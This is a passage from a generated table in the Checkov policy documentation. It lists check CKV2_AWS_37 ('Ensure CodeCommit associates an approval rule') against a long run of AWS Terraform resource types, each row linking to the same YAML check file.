approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 888 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 889 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 890 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 891 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 892 | CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 893 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 894 | CKV2_AWS_37 | 
resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 895 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 896 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 897 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 898 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 899 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 900 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 901 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 902 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 903 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 904 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 905 | CKV2_AWS_37 | resource | aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 906 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 907 | CKV2_AWS_37 | resource | aws_api_gateway_stage 
| Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 908 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 909 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 910 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 911 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 912 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 913 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 
914 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 915 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 916 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 917 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 918 | CKV2_AWS_37 | resource | aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 919 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 920 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 921 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 922 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 923 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 924 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 925 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 926 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 927 | CKV2_AWS_37 | resource | aws_appmesh_mesh | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 928 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 929 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 930 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 931 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 932 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 933 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 934 | CKV2_AWS_37 | 
resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 935 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 936 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 937 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 938 | CKV2_AWS_37 | resource | aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 939 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 940 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 941 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 942 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 943 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 944 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 945 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 946 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 947 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 948 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 949 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 950 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 951 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 952 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 953 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 954 | CKV2_AWS_37 | resource | 
aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 955 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 956 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 957 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 958 | CKV2_AWS_37 | resource | aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 959 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 960 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 961 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 962 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 963 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 964 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 965 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 966 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 967 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 968 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 969 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 970 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 971 | CKV2_AWS_37 | resource | aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 972 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 973 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 974 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 975 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 976 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 977 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 978 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 979 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 980 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 981 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 982 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 983 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 984 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 985 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 986 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 987 
| CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 988 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 989 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 990 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 991 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 992 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval 